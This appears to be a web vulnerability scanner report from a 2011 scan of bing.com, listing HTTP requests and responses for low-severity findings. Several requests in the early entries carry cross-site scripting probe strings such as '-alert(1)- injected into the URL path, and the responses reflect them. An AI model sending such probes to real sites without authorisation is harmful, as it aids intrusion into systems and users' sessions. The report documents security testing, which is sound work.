HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 X-BM-TraceID: c63219ddd680488b8209 SearchRequest: Microsoft.VirtualEarth SearchRequestState: Success X-AspNet-Version: 2.0.50727 X-BM-Srv: BL2M001208 Vary: Accept-Encoding Date: Sat, 26 Mar 2011 01:04:16 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: VE_LSV=cache=0; path=/local Content-Length: 32170 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bing.com |
Path: | /local/aa461'-alert(%2564 |
GET /local/aa461'-alert(%2564 Host: www.bing.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CID=fe59c2dc18aa4020 |
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 X-BM-TraceID: b7afce04e6d243759432 SearchRequest: Microsoft.VirtualEarth SearchRequestState: X-AspNet-Version: 2.0.50727 X-BM-Srv: BL2M001208 Vary: Accept-Encoding Date: Sat, 26 Mar 2011 01:03:50 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: VE_LSV=cache=0; path=/local/aa461'-alert( Content-Length: 23624 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bing.com |
Path: | /local/aa461'-alert(1)- |
GET /local/aa461'-alert(1)- Host: www.bing.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CID=fe59c2dc18aa4020 |
HTTP/1.1 302 Moved Temporarily Cache-Control: private Content-Type: text/html; charset=utf-8 Location: http://www.bing.com:80 X-BM-TraceID: 2a28fc725dfd4392bafb X-AspNet-Version: 2.0.50727 X-BM-Srv: BL2M001210 Vary: Accept-Encoding Date: Sat, 26 Mar 2011 01:03:55 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: _HOP=I=1&TS=1301101434; domain=.bing.com; path=/ Content-Length: 175 <html><head><title>Object moved</title></head><body <h2>Object moved to <a href="http://www.bing.com </body></html> |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bing.com |
Path: | /local/aa461'-alert(1)- |
GET /local/aa461'-alert(1)- Host: www.bing.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CID=fe59c2dc18aa4020 |
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 X-BM-TraceID: 22448f9569dd40058bf1 SearchRequest: Microsoft.VirtualEarth SearchRequestState: Success X-AspNet-Version: 2.0.50727 X-BM-Srv: BL2M001203 Vary: Accept-Encoding Date: Sat, 26 Mar 2011 01:03:57 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: VE_LSV=cache=0; path=/local/aa461'-alert Content-Length: 22932 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bing.com |
Path: | /local/us/dc/washington |
GET /local/us/dc/washington Host: www.bing.com Proxy-Connection: keep-alive Referer: http://www.bing.com/local User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CID=fe59c2dc18aa4020 |
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 X-BM-TraceID: 147c0045befc4bdcb48d SearchRequest: Microsoft.VirtualEarth SearchRequestState: Success X-AspNet-Version: 2.0.50727 X-BM-Srv: BL2M001206 Vary: Accept-Encoding Date: Sat, 26 Mar 2011 01:04:27 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: VE_LSV=cache=0; path=/local/us/dc Content-Length: 91062 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bing.com |
Path: | /maps |
GET /maps HTTP/1.1 Host: www.bing.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SL=true; htsk=false; cbout=false; SRCHUID=V=2&GUID |
HTTP/1.1 301 Moved Permanently Cache-Control: private Content-Length: 0 Location: http://www.bing.com/maps/ P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy Date: Sat, 26 Mar 2011 00:55:10 GMT Connection: close Set-Cookie: _HOP=I=2&TS=1301100910; domain=.bing.com; path=/ |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bing.com |
Path: | /videos |
GET /videos HTTP/1.1 Host: www.bing.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SRCHUID=V=2&GUID |
HTTP/1.1 302 Moved Temporarily Cache-Control: private Content-Length: 0 Location: http://www.bing.com P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy Date: Sat, 26 Mar 2011 01:24:09 GMT Connection: close Set-Cookie: VIDSCHUSR=CLICKMODE=0 Set-Cookie: _HOP=I=1&TS=1301102649; domain=.bing.com; path=/ |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bing.com |
Path: | /travel/jsxc.vjs |
GET /travel/jsxc.vjs?p Host: www.bing.com Proxy-Connection: keep-alive Referer: http://www.bing.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: lbc=1; ETID=BCID-z168rde13i |
HTTP/1.1 200 OK Content-Type: text/javascript Last-Modified: Tue, 01 Jan 2009 00:00:00 GMT Vary: Accept-Encoding Content-Length: 131676 Cache-Control: public, max-age=314489852 Expires: Fri, 12 Mar 2021 23:23:49 GMT Date: Sat, 26 Mar 2011 01:06:17 GMT Connection: close /* File: /validation.js */ function isEmpty(obj) { for (var n in obj) { return false; } return true; } function isValidAddress(anElement var aValue = anElement.value; var mikExp1 = / ...[SNIP]... esults == -1) { alert(errorMsg); anElement.focus(); return false; }else{return true;} } function isValidEmail(anElement){ if(!validateEmail alert("Please enter a valid email address (e.g. jane.doe@my-email.com or john_doe@johndoe.com)"); return false; } else{ return true; } } function validateEmail(anElement) { var emailAddress = anElement.value; var regExp = /^[\w-]+(\.[\w-]+)*@([\w- return emailAddress.mat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bing.com |
Path: | /travel/scripts/sCode.js |
GET /travel/scripts/sCode.js Host: www.bing.com Proxy-Connection: keep-alive Referer: http://www.bing.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: lbc=1; ETID=BCID-z168rde13i |
HTTP/1.1 200 OK Content-Type: text/javascript Last-Modified: Tue, 01 Jan 2009 00:00:00 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 23302 Cache-Control: public, max-age=314489762 Expires: Fri, 12 Mar 2021 23:22:22 GMT Date: Sat, 26 Mar 2011 01:06:20 GMT Connection: close /** Hard coded to fail to /travel if we can't determine the path for the omniture cookies**/ var s_cookiePath_a = document.location s_cookiePath_a = s_cookiePath_a.split('/') s_cookiePat ...[SNIP]... `i+s.hav()+q+(qs?qs:s.rq( +"_r)s.p_r()}^7(qs);^y`o( +"`R`N^K=t;s.`N`g=n;s.t( ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bing.com |
Path: | /search |
GET /search?q=James+Dean&FORM Host: www.bing.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SRCHUID=V=2&GUID |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Date: Sat, 26 Mar 2011 01:04:53 GMT Connection: close Connection: Transfer-Encoding Content-Length: 55494 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <a class="sa_cpt" u="0|1000|4832186282674202|9e29617c,cd3807d1"> ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.bing.com |
Path: | /entertainment/services |
GET /entertainment/services Host: www.bing.com Proxy-Connection: keep-alive Referer: http://www.bing.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Content-Type: application/x-www-form Accept: text/javascript, application/javascript, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SRCHUID=V=2&GUID |
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 167 Content-Type: text/html; charset=utf-8 Expires: -1 X-AspNet-Version: 2.0.50727 Vary: Accept-Encoding Date: Sat, 26 Mar 2011 01:06:17 GMT Connection: close jsonp1301101466664({"user |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.bing.com |
Path: | /fd/AnswerBarHandler |
GET /fd/AnswerBarHandler?q Host: www.bing.com Proxy-Connection: keep-alive Referer: http://www.bing.com/maps/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SRCHUID=V=2&GUID |
HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 331 Content-Type: text/html; charset=utf-8 P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy Vary: Accept-Encoding Date: Sat, 26 Mar 2011 00:56:52 GMT Connection: close <ul class="sw_a" id="sw_abarl"><li><a href="/search?q=02110" onmousedown="return si_T('&ID=FD,4.1')" ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.bing.com |
Path: | /getimage |
GET /getimage?q=FEV3 Host: www.bing.com Proxy-Connection: keep-alive Referer: http://www.bing.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SRCHUID=V=2&GUID |
HTTP/1.1 200 OK Content-Length: 3120 Content-Type: image/jpeg P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy Cache-Control: public, max-age=64734 Date: Sat, 26 Mar 2011 01:05:18 GMT Connection: close ......JFIF.....`.`.....C. ................... $.' ",#..(7),01444.'9=82<.342 ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.bing.com |
Path: | /maps/default.aspx |
POST /maps/default.aspx?q Host: www.bing.com Proxy-Connection: keep-alive Referer: http://www.bing.com/maps/ Content-Length: 2674 Origin: http://www.bing.com Cache-Control: no-cache X-MicrosoftAjax: Delta=true User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Content-Type: application/x-www-form Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SL=true; htsk=false; cbout=false; FLCASET=Mon%2c+01+Jan scriptManager=script ...[SNIP]... |
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 X-BM-TraceID: 7754137a4c054e5e9708 X-Ve-Server: BL2-01205-20110317.509-0 X-AspNet-Version: 2.0.50727 X-BM-Srv: BL2M001205 Vary: Accept-Encoding Date: Sat, 26 Mar 2011 00:56:54 GMT Connection: close Connection: Transfer-Encoding Content-Length: 28057 7245|updatePanel|TaskHost ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.bing.com |
Path: | /search |
GET /search?q=%7bAS%3a Host: www.bing.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SRCHUID=V=2&GUID |
HTTP/1.1 200 OK Cache-Control: private Content-Length: 116 Content-Type: text/html; charset=utf-8 P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy Vary: Accept-Encoding Date: Sat, 26 Mar 2011 01:06:24 GMT Connection: close Ref A: F829028740354D228CAC PST |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.bing.com |
Path: | /travel/jsdf.vjs |
GET /travel/jsdf.vjs?v Host: www.bing.com Proxy-Connection: keep-alive Referer: http://www.bing.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: lbc=1; ETID=BCID-z168rde13i |
HTTP/1.1 200 OK Content-Type: text/javascript Last-Modified: Tue, 01 Jan 2009 00:00:00 GMT Vary: Accept-Encoding Content-Length: 1048 Cache-Control: public, max-age=312634926 Expires: Fri, 19 Feb 2021 12:08:24 GMT Date: Sat, 26 Mar 2011 01:06:18 GMT Connection: close FC.Date.Registry['date FC.Date.Registry['date FC.Date.Registry['date ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.bing.com |
Path: | /travel/jsrp.vjs |
GET /travel/jsrp.vjs?c=shared Host: www.bing.com Proxy-Connection: keep-alive Referer: http://www.bing.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: lbc=1; ETID=BCID-z168rde13i |
HTTP/1.1 200 OK Content-Type: text/javascript Last-Modified: Tue, 01 Jan 2009 00:00:00 GMT Vary: Accept-Encoding Content-Length: 10980 Cache-Control: public, max-age=310326938 Expires: Sat, 23 Jan 2021 19:01:55 GMT Date: Sat, 26 Mar 2011 01:06:17 GMT Connection: close FC.ResourcePath.Registry[ FC.ResourcePath.Registry[ ...[SNIP]... |